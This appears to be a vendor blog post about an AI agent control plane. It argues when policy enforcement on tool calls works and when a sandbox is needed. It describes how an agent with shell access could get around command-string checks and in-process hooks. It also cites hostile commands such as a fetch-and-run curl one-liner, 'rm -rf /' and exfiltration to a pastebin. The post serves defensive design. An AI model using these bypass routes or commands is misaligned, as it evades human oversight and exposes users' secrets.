When to Use an Agentic Control Plane (and When to Reach for a Sandbox)
There’s a recurring objection to runtime agent governance: “the model is non-deterministic, so it’ll just reason its way around any policy.” That one is confused, and you should reject it. A control plane’s decision is code, not a model — acp_check/the policy engine returns allow or deny upstream of the agent’s stochasticity. The packet goes or it doesn’t. How clever the model is has nothing to do with it.
But there’s a sharper objection underneath it that’s worth taking seriously, because it’s correct in specific places — and being honest about where it bites is what separates a real control plane from snake oil. It’s the reference monitor question, settled since 1972: an enforcement mechanism holds only if it is non-bypassable (on every path), tamper-proof, and small enough to trust. The agent doesn’t beat your policy by being smart. It beats it by doing something that never routes through your gate.
So the only real question for any control plane is: is it sitting on a boundary it can completely mediate? For some things the answer is clearly yes. For others it’s clearly no — and we’ll tell you which is which, because pretending otherwise is how you ship a security setting that doesn’t work, which is worse than none.
Use a control plane for the boundaries it completely mediates
These are the places ACP sits on a real chokepoint — where a deterministic decision is also a complete one:
- Typed tool calls. When an agent calls a tool through the control plane — an MCP tool (
notion.readPage,github.createIssue), or a wrapped SDK tool — ACP executes the handler. The tool’s effect is the call ACP mediates. Identity, scope, rate, and PII checks run on every one, and there’s no back door, because the tool can’t fire without crossing the gate. - Delegation identity across hops. When agent A invokes agent B invokes a tool, the originating user’s identity, scopes, and budget propagate and narrow at every hop. A sandbox can’t express “this is the CFO’s agent two hops deep, allowed this tool and not that one.” Identity-aware, delegation-aware policy is exactly what a container doesn’t give you.
- The model proxy. Route the agent’s model calls through ACP and the
tool_callsthe model emits are governed before they reach the agent — denied calls are stripped from the response. Plus you get the thing a sandbox never will: priced visibility — which model, loop vs. leaf, what each run costs. - Audit and content safety on those calls. Every governed call is identity-attributed, logged, and exportable; high-precision PII is detected (and redacted by policy). That’s the compliance artifact auditors actually ask for.
If your agents are doing real work through typed tools and SaaS APIs — the enterprise shape of the problem — this is the layer that governs it, and the “reason around it” objection is dead on arrival, because none of these boundaries are things the agent can step around.
Reach for a sandbox when the tool surface is a shell
Here’s the honest other half. A control plane is not the right primary control when:
- Raw shell/exec is the agent’s main tool, on a machine with live secrets. A coding agent’s whole job is a Turing-complete
bashtool. ACP can pattern-match the command string — and that genuinely catches mistakes and obvious-bad (rm -rf /, an obviouscurlto a pastebin). Butmake buildreads your.env, andbash -c "$(curl x)"doesn’t tell anyone what runs. Command-string matching is guardrails against accidents, not a hard boundary against a determined exfiltrator. The effects aren’t in the string. - You need bypass-resistance against an adversarial agent. A hook that fires in the agent’s own process shares its privilege — if the agent can run arbitrary code, it can route around an in-process check (this is why
--dangerously-skip-permissionsexists and disables hooks). For an actually-hostile agent, you want a boundary outside its address space.
For that threat model — solo dev, coding agent, secrets in the repo — a sandbox (container, VM, OS file permissions) genuinely solves the problem better than a policy layer does, because it gives you the one thing the policy layer can’t on a shell: bypass-resistance. We’ll say that plainly. Don’t put a policy prompt in front of a tool whose effect set is “anything.”
They compose — that’s the actual architecture
This isn’t control-plane vs. sandbox. The two solve different halves:
- The sandbox gives you bypass-resistance — one door, no way around it. But it’s a dumb boundary: block the network or don’t.
- The control plane gives you the semantic policy on that door that a container can’t express: this identity, at this delegation depth, doing this task, may call these tools and reach these destinations — and here’s the audit trail.
The place they meet is egress. The network is the one boundary where mediation can be complete for the thing this whole debate is really about — exfiltration. Bytes can’t leave the box without crossing the wire, no matter which tool or subprocess produced them. So the sound design is: run the powerful, opaque tools in a sandbox, and put the policy brain on the egress chokepoint — not “block the network” (a firewall does that and breaks the agent) but “redact secrets and allow this destination, not that one, with a record of what crossed.” That semantic egress layer is on our roadmap, and it’s the piece a sandbox leaves dumb.
The short version
Use an agentic control plane to govern what it can completely mediate: typed tool calls, delegation identity, the model proxy, audit, and cost. Use a sandbox to contain raw shell and untyped code. Run them together — the sandbox makes the boundary bypass-resistant, the control plane makes it intelligent.
The fastest way to misuse either one is to ask it to do the other’s job: a sandbox can’t tell you a delegation chain exceeded its budget, and a policy prompt can’t stop a shell from emptying your secrets. Pick the boundary that’s complete for the threat you actually have.